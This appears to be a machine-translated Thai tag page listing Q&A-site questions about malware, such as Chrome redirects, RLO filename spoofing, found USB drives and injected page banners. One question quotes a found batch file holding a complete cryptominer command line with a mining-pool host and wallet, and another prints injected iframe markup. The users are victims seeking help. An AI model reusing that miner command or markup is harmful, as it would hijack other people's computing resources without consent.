คำถามติดแท็ก malware

เป็นไปได้หรือไม่ที่จะจัดเก็บข้อมูลโดยพลการเช่นเอกสารหรือโปรแกรมในรูปแบบของไฟล์ภาพเช่นภาพ PNG? ความกังวลของฉันคือใครบางคนสามารถเข้ารหัสข้อมูลเพื่อใช้งานโดยมัลแวร์ในภาพและอัปโหลดไปยังเว็บไซต์เช่น Flickr

25 security  images  malware  png 

ปิด. คำถามนี้เป็นคำถามปิดหัวข้อ ไม่ยอมรับคำตอบในขณะนี้ ต้องการปรับปรุงคำถามนี้หรือไม่ อัปเดตคำถามเพื่อให้เป็นหัวข้อสำหรับผู้ใช้ขั้นสูง ปิดให้บริการใน5 ปีที่ผ่านมา สถานการณ์ที่ฉันเผชิญคือสมาชิกในครอบครัวที่มีตำแหน่งต่อไปนี้: ฉันไม่ต้องการอัปเดตบางสิ่งที่ใช้งานได้การอัปเดตอาจทำให้บางอย่างเสียหาย ดูคอมพิวเตอร์เก่าของเราที่ใช้ Windows 98 ฉันใช้มันทุกวันเป็นเวลา 15 ปีแล้วและมันก็ทำงานได้โดยไม่มีปัญหาแม้จะไม่มีแอนติไวรัสหรืออะไรก็ตาม ด้วยการใช้เหตุผลเดียวกันเขาไม่เห็นด้วยอย่างยิ่งกับการติดตั้งอัพเดทหรือเซอร์วิสแพ็คบนคอมพิวเตอร์เครื่องอื่นที่ใช้ Windows XP และตอนนี้ XP นั้นตายไปแล้วฉันไม่สามารถจินตนาการได้เลยว่าเขาจะตอบสนองต่อตัวเลือกของทั้งสองหรือไม่ ซื้อ Windows 7 หลายเครื่องสำหรับคอมพิวเตอร์ของเขาด้วยเงินจริงหรือ เปลี่ยนเป็น Linux และโดยพื้นฐานแล้วจะเรียนรู้วิธีการใช้คอมพิวเตอร์ตั้งแต่เริ่มต้น ฉันสามารถใช้ข้อเท็จจริงอะไรในการสื่อถึงพวกเขาว่ามันไม่ดีถ้าคอมพิวเตอร์นั้นติดมัลแวร์แม้ว่าพวกเขาจะไม่สังเกตเห็นอะไรผิดปกติก็ตาม

25 security  malware 

ตามคำตอบของโพสต์อื่นเราไม่ควรได้รับการอัพเดตใด ๆ เพิ่มเติมสำหรับ Windows XP แต่ผมรู้สึกการปรับปรุงที่ได้รับ: สิ่งนี้บ่งบอกว่าระบบของฉันถูกบั๊กหรือถูกบุกรุก (โปรแกรมประสงค์ร้ายบางอันพยายามหลอกให้ฉันคลิก "ดาวน์โหลด" ซึ่งดาวน์โหลดซอฟต์แวร์ของพวกเขาหรือไม่)?

24 windows-xp  windows-update  malware 

ดูเหมือนว่าฉันจะติดมัลแวร์ โดยเฉพาะอย่างยิ่งทุก ๆ คราว (ทุกๆสองสามวันโดยปกติ) ฉันถูกเปลี่ยนเส้นทางไปยังหน้าเว็บที่ขอให้ฉันดาวน์โหลดบางอย่างซึ่งมักจะเป็น "เวอร์ชันใหม่ของ Flash" สันนิษฐานว่ามันไม่มีอะไร แต่จริง ๆ แล้วเป็นไวรัสหรือโทรจันบางประเภท ฉันใช้google-chromeเวอร์ชั่น 30.0.1599.114 บน Debian Linux และค่อนข้างแน่ใจว่าสิ่งนี้เกิดจากส่วนขยาย ฉันรู้ว่าฉันสามารถถอนการติดตั้งส่วนขยายหรือลบ~/.config/google-chromeโฟลเดอร์ของฉันได้แต่ฉันไม่อยากทำ ฉันต้องการระบุส่วนขยายที่ทำให้เกิดสิ่งนี้และลบเฉพาะส่วนขยายนั้น ในการพยายามแก้ไขข้อบกพร่องนี้ (ขอบคุณ @Braiam) ฉันได้ตรวจสอบตัวบันทึกเหตุการณ์chrome://net-internals/#eventsแล้วและค้นหาหนึ่งใน URL ที่ฉันเปลี่ยนเส้นทางไปที่: เนื้อหาของchrome://net-internals/#eventsคือ: 122667: URL_REQUEST http://cdn.adnxs.com/p/d9/32/a3/72/d932a372371bd0a47ba7e2a73649a8d0.swf?clickTag=http%3A%2F%2Ffra1.ib.adnxs.com%2Fclick%3FSRPvAE9aoD_c-TxO6i6ZP-kmMQisHO4_3Pk8TuoumT9JE-8AT1qgP3vmRkLiiPF6ljpJTzhxcH-5rRRTAAAAABwgIwByBwAAPwEAAAIAAADRAMMAVqgFAAAAAQBVU0QAVVNEANgCWgDHsgAAFIsAAQUCAQIAAIwAeiTtsAAAAAA.%2Fcnd%3D%2521NgbzOgjzkMEBENGBjAYY1tAWIAA.%2Freferrer%3Dhttp%253A%252F%252Ffra1.ib.adnxs.com%252Fif%253Fenc%253DgbdAguLHaD8eqb7zixJkP_LSTWIQWOk_Hqm-84sSZD-At0CC4sdoP2mCZbZYUNUFljpJTzhxcH-3rRRTAAAAAJL-IgB2AgAAUAMAAAIAAAA9ocQAN0sEAAAAAQBVU0QAVVNEANgCWgD8ogAA58sAAgUCAQIAAIwA9idtvAAAAAA.%2Fclickenc%3Dhttp%253A%252F%252Ffra1.ib.adnxs.com%252Fclick%253FXkiHhzB-Wj-D_TJz3IRWP3E9CtejcNU_g_0yc9yEVj9eSIeHMH5aP_ygL0YyHDQoljpJTzhxcH-2rRRTAAAAAEJLIQBJAQAAVwMAAAIAAACL0cUA0WAFAAAAAQBVU0QAVVNEANgCWgDQMgAAUdQDAQUCAQIAAIwA3yN4YgAAAAA.%252Fcnd%253D%25218gXSNwiT18QBEIujlwYY0cEVIAA.%252Freferrer%253Dhttp%253A%252F%252Fwww.imgclck.com%252Fserve%252Fimgclck.php%252Fclickenc%253Dhttp%253A%252F%252Foptimized-by.rubiconproject.com%252Ft%252F9164%252F15602%252F101258-2.3581666.3755480%253Furl%253Dhttp%25253A%25252F%25252Fwww.downloadchop.com%25252Fgo%25252Flightspark%25253Fsource%25253Dybrant_lightspark-fr%252526adprovider%25253Dybrant%252526ce_cid%25253Dfra1CJb1pPqEp5y4fxACGPvMm5KknOL4eiINODIuMjI5LjIyLjE2NigBMLnb0pgF%252526subid%25253D2301980 Start Time: 2014-03-03 17:28:41.358 t=1393864121358 [st= 0] +REQUEST_ALIVE [dt=334] t=1393864121359 [st= 1] +URL_REQUEST_START_JOB [dt=332] --> load_flags = 134349184 (ENABLE_LOAD_TIMING | …

21 linux  google-chrome  malware 

มีวิธีใดบ้างในการหลีกเลี่ยงหรือป้องกันไฟล์ที่มีอักขระ Unicode RLO (ขวาไปซ้าย) ในชื่อของพวกเขา (วิธีมัลแวร์ในการปลอมแปลงชื่อไฟล์) จากการเขียนหรืออ่านในพีซี Windows ข้อมูลเพิ่มเติมเกี่ยวกับอักขระ Unicorn RLO ที่นี่: อักขระ Unicode 'ทับขวาไปทางซ้าย' (U + 202E) ข้อความสองทิศทาง ข้อมูลเกี่ยวกับตัวอักษร RLO unicode เนื่องจากมีการใช้งานโดยมัลแวร์: สรุปรายงานเหตุการณ์การเข้าถึงคอมพิวเตอร์โดยไม่ได้รับอนุญาตในเดือนตุลาคม 2554 รวบรวมโดยหน่วยงานส่งเสริมเทคโนโลยีสารสนเทศญี่ปุ่น (IPA) [ กระจก (Google Cache) ] คุณสามารถลองหน้าเว็บทดสอบอักขระ RLOนี้เพื่อดูว่าอักขระ RLO ทำงานอย่างไร อักขระ RLO ถูกวางในฟิลด์ 'การทดสอบการป้อนข้อมูล' ในหน้าเว็บนั้นแล้ว ลองพิมพ์ที่นั่นและสังเกตว่าอักขระที่คุณกำลังพิมพ์นั้นออกมาในลำดับที่กลับกัน (จากขวาไปซ้ายแทนที่จะเป็นจากซ้ายไปขวา) ในชื่อไฟล์ตัวละคร RLO สามารถจัดตำแหน่งโดยเฉพาะในชื่อไฟล์เพื่อสวมรอยหรือปลอมตัวว่ามีชื่อไฟล์หรือนามสกุลไฟล์ที่แตกต่างจากที่มีอยู่จริง (จะยังคงซ่อนอยู่แม้ว่าจะไม่ได้ทำเครื่องหมาย' ซ่อนนามสกุลสำหรับไฟล์ที่รู้จัก ') ข้อมูลเดียวที่ฉันจะพบว่ามีข้อมูลเกี่ยวกับวิธีการป้องกันไฟล์ที่มีตัวอักษร …

20 windows  security  virus  malware  unicode 

ตามที่เป็นอยู่ในปัจจุบันคำถามนี้ไม่เหมาะสำหรับรูปแบบคำถาม & คำตอบของเรา เราคาดหวังคำตอบที่จะได้รับการสนับสนุนจากข้อเท็จจริงการอ้างอิงหรือความเชี่ยวชาญ แต่คำถามนี้มีแนวโน้มที่จะเรียกร้องให้มีการอภิปรายโต้แย้งโต้แย้งหรือการอภิปรายเพิ่มเติม หากคุณรู้สึกว่าคำถามนี้สามารถปรับปรุงและเปิดใหม่ได้โปรดไปที่ศูนย์ช่วยเหลือเพื่อขอคำแนะนำ ปิดให้บริการใน7 ปีที่ผ่านมา ฉันไม่เรียกใช้โปรแกรมป้องกันไวรัสบน Linux (คนส่วนใหญ่ที่ฉันไม่ได้เป็น AFAIK) และฉันไม่ได้กังวลเกี่ยวกับมัลแวร์หรือสปายแวร์ในรูปแบบใด ๆ หรือ other_bad_ware ใด ๆ ฉันควรกังวลโดย? แน่นอนฉันไม่ได้ทำงานเหมือนรูท

20 linux  security  anti-virus  malware 

คำถามนี้มีคำตอบอยู่ที่นี่แล้ว : ฉันจะตรวจสอบแท่ง USB ได้อย่างปลอดภัยที่พบในลานจอดรถในที่ทำงานได้อย่างไร (7 คำตอบ) ปิดให้บริการใน2 ปีที่ผ่านมา สมมติว่าคุณพบไดรฟ์ usb บนถนนและคุณต้องการมั่นใจ 100% ว่าไม่ได้ถูกดัดแปลงไม่ว่าจะทางซอฟต์แวร์หรือโดยการดัดแปลงฮาร์ดแวร์ (เพิ่มหรือแก้ไขส่วนประกอบ ฯลฯ ) เพื่อให้ไม่มีความเสี่ยงใด ๆ มัลแวร์ การจัดรูปแบบเต็มที่เพียงพอที่จะมั่นใจได้ 100% หรือไม่ยังไม่มีมัลแวร์ ถ้าเป็นเช่นนั้นจะทำการฟอร์แมทเต็มรูปแบบด้วยกระบวนการช้ามาตรฐานจากภายใน Disk Utility ใน Tails 3.2 เพียงพอที่จะทำหรือไม่? ใช้ความสามารถทางเทคนิคที่เป็นไปได้สูงสุดจากผู้โจมตี ไม่ใช่แค่สถานการณ์ที่สมเหตุสมผลหรือน่าเชื่อถือ

18 usb  security  usb-flash-drive  malware  malware-removal 

ฉันดูออนไลน์แล้วไม่สามารถหาข้อมูลจำนวนมากเกี่ยวกับเครื่องมือตัวช่วยตัวใหม่ของ Java ได้ ฉันได้พบเธรดอื่นที่นี่ใน SE แต่ไม่ได้อธิบายมาก มันเป็นสิ่งที่ให้บริการ bloatware และพยายามให้คุณดาวน์โหลดมันหรือไม่? ฉันกำลังอัปเดต Java และแจ้งให้ฉันลงชื่อเข้าใช้ด้วยบัญชีผู้ดูแลระบบของฉันเพื่อติดตั้งเครื่องมือตัวช่วยใหม่ของ Java ใครบ้างที่ประสบปัญหานี้ ถ้าเป็นเช่นนั้นคุณหาวิธีถอนการติดตั้งหรือคุณเก็บไว้ในเครื่องของคุณ

18 mac  java  malware  adware 

ฉันกำลังพัฒนาเว็บไซต์ของฉันเมื่อมีแบนเนอร์แปลก ๆ ปรากฏขึ้น ครั้งแรกที่ฉันคิดว่ามันเป็นความผิดของฉันแล้วมันเป็นความผิดของผู้ให้บริการเว็บโฮสติ้งและตอนนี้ฉันก็ไม่รู้ว่ามันมาจากไหน ฉันรู้ว่ามันดูน่าเกลียดและส่งผลกระทบต่อทุกหน้าที่ฉันเข้าชม ดูว่าส่วนท้ายของ StackOverflow มีลักษณะอย่างไร: รหัสไม่ปรากฏใน 'ดูแหล่งที่มาของหน้า' แต่จะปรากฏขึ้นเมื่อฉันดูจาก 'ตรวจสอบองค์ประกอบ' และดูที่ HTML ที่แสดงผล มี div มากกว่า แต่บางอันก็ว่างเปล่า มีจำนวนมากของรหัสต่างประเทศที่นี่ นี่คือหลักหนึ่ง: <div id="op_ad"> <br> <center> <iframe src="http://www.games-free-apps.com/games/b.html" style="border:none;width:310px;height:255px;overflow:hidden;" frameborder="0" marginheight="0" marginwidth="0"> <!-- MORE CODE HERE --> </iframe> </center> </div> และภาพหน้าจอที่ละเอียดยิ่งขึ้นของรหัสที่รบกวนเวลานี้จากเว็บไซต์ของฉัน: ดังนั้นนี่คือข้อผิดพลาดของ Chrome สิ่งที่ฉันทำลายอย่างใด (ฉันไม่เคยเห็นโค้ดเหล่านี้) หรือมัลแวร์? ความคิดใด ๆ ของฉันจะแก้ไขได้อย่างไร ฉันใช้ Google …

18 google-chrome  malware 

ฉันสังเกตว่าระบบของฉันทำงานช้าวันนี้และตรวจสอบรายชื่อผู้ใช้ระบบใน Terminal เพื่อเป็นการป้องกันไว้ก่อน ฉันพบผู้ใช้หลายคนที่ฉันไม่รู้จัก ฉันควรจะกังวลหรือไม่ _applepay _captiveagent _ctkd _datadetectors _findmydevice _gamecontrollerd _hidd _mbsetupuser _mobileasset _ondemand _pcastagent _pcastlibrary _pcastserver _wwwproxy _xgridagent _xgridcontroller _xserverdocs

18 macos  mac  malware  macos-sierra 

ฉันเพิ่งพบไฟล์. bat นี้ชื่อ scvhost.bat ไฟล์มีเนื้อหานี้อยู่: scvhost -a cryptonight -o stratum+tcp://xmr-eu.dwarfpool.com:8005 -u 48uh2mrdkdq2tQysfkX2hZDi2hkRua4GX13EqY8djJ5xNXhez7baztVWbwXa34vUMveKAzAiA4j8xgUi29TpKXpm42jqV6H.microSf -p MXXXXXX-t 02 นี่เป็นไวรัส (เพื่อขโมยข้อมูล ฯลฯ ) หรือนักขุดที่ปลูกหรือไม่ ฉันเป็นห่วงเพราะฉันยังตะลุยสกุลเงินดิจิตอลและstratumเป็นสกุลเงินที่กล่าวถึงในไฟล์ด้านบน

17 windows  batch-file  malware  cryptomining 

ฉันกำลังติดตั้ง Windows 10 และลบ bloatware Intel Security Assist ทำอะไรและทำไมจึงติดตั้ง นอกจากนี้ยังมีความเกี่ยวข้องกับ IME และวิธีการที่เหมาะสมที่จะเชื่อว่ามีการจัดเตรียม / อำนวยความสะดวกในการจัดหาประตูหลังเข้าสู่ระบบปฏิบัติการ (หลังจากผ่านไปเกือบหนึ่งปีฉันยังไม่พบข้อมูลที่มีความหมายเกี่ยวกับมันใน Google) อัปเดต - คำถามนี้มีการดูมากกว่า 26,000 ครั้งและเป็นหนึ่งในผลลัพธ์แรกเมื่อค้นหา แต่ไม่มีคำตอบที่มีความหมายดังนั้นฉันจึงเพิ่มความโปรดปราน การอัปเดตเก่า - มีคำตอบบางส่วนด้านล่างยืนยันส่วนหนึ่งของแพลตฟอร์ม IME แต่สิ่งนี้จะอธิบายว่าประโยชน์ / ประโยชน์ของโปรแกรมคืออะไร (โดยเฉพาะกับผู้ใช้)

16 security  malware 

ไคลเอนต์อีเมลส่วนใหญ่ไม่แสดงรูปภาพตามค่าเริ่มต้นในเนื้อหาของอีเมล แต่ฉันยังไม่เข้าใจ การแสดงรูปภาพของงานโจมตีคอมพิวเตอร์ได้อย่างไร

15 security  email  images  virus  malware 

คำถามอย่างรวดเร็ว: ฉันใช้แป้นพิมพ์บนหน้าจอเมื่อป้อนรหัสผ่านธนาคารหมายเลขบัตรเครดิตและอื่น ๆ เพื่อป้องกันมัลแวร์ นี่เป็นความคิดที่ดีหรือฉันกำลังเสียเวลาหรือไม่? เว็บไซต์ธนาคารทางอินเทอร์เน็ตบางแห่งมีแป้นพิมพ์บนหน้าจอสำหรับป้อนรหัสผ่านมีความปลอดภัยมากขึ้นไหม

14 security  keyboard  malware 

ปิด คำถามนี้เป็นคำถามความคิดเห็นตาม ไม่ยอมรับคำตอบในขณะนี้ ต้องการปรับปรุงคำถามนี้หรือไม่ อัปเดตคำถามเพื่อให้สามารถตอบข้อเท็จจริงและการอ้างอิงได้โดยแก้ไขโพสต์นี้ ปิดให้บริการใน4 ปีที่แล้ว GWX หรือที่รู้จักกันในชื่อป๊อปอัป "รับ Windows 10" ทำหน้าที่คล้ายกับมัลแวร์อย่างน่าสงสัยยกเว้นว่า Microsoft ทำขึ้น เช่นเดียวกับมัลแวร์ GWX: ติดตั้งตัวเองโดยไม่ได้รับความยินยอมจากผู้ใช้เป็นการอัปเดต "สำคัญ" ดาวน์โหลดและ "preloads" ไฟล์การติดตั้ง Windows 10 มูลค่า 6 GB โดยไม่ได้รับความยินยอมจากผู้ใช้ nags ผู้ใช้อย่างต่อเนื่องเกี่ยวกับการดาวน์โหลด Windows 10 ป้องกันไม่ให้ผู้ใช้ปิดการใช้งานอย่างถาวร เปลี่ยนพฤติกรรมด้วยการเพิ่มฟีเจอร์ที่ไม่มีเอกสารเพื่อป้องกันการปิดการใช้งาน ต้องใช้เครื่องมือพิเศษบุคคลที่สามที่จะลบออกจากระบบโดยสมบูรณ์ โฆษณาผลิตภัณฑ์อื่นแม้ว่าผู้ใช้ Windows 7 จะได้รับฟรี เป็นโปรแกรมที่อาจไม่พึงประสงค์ (PUP) แม้ TechRadar หมายถึงการพัฒนาอย่างต่อเนื่อง GWX แผงควบคุมในฐานะที่เป็น"ขึ้นเนินสงคราม"กับการปรับปรุงแบบสุ่มดูเหมือนจะผลักดันรุ่นใหม่ GWX (ด้วยเทคนิคใหม่) Windows 7 …

14 windows-7  malware